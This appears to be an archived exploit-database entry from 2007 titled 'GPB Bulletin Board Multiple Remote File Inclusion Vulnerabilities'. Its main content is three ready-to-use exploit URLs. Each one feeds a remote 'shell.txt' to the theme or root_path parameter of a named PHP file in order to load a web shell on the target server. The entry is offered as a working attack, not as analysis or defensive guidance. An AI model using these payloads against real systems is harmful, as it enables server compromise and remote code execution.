GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : GPB Bulletin Board Multiple Remote File Inclusion Vulnerabilities
# Published : 2007-04-24
# Author : ThE TiGeR
# Previous Title : e107 0.7.8 (mailout.php) Access Escalation Exploit (admin needed)
# Next Title : USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability

#GPB bulletin board Remote file include                                                        

#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz

#D0rk : Download Script and install it in ur machine

#Exploit :

#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?

#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?

#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger100[at]hotmail[dot]com

# www.Syue.com [2007-04-24]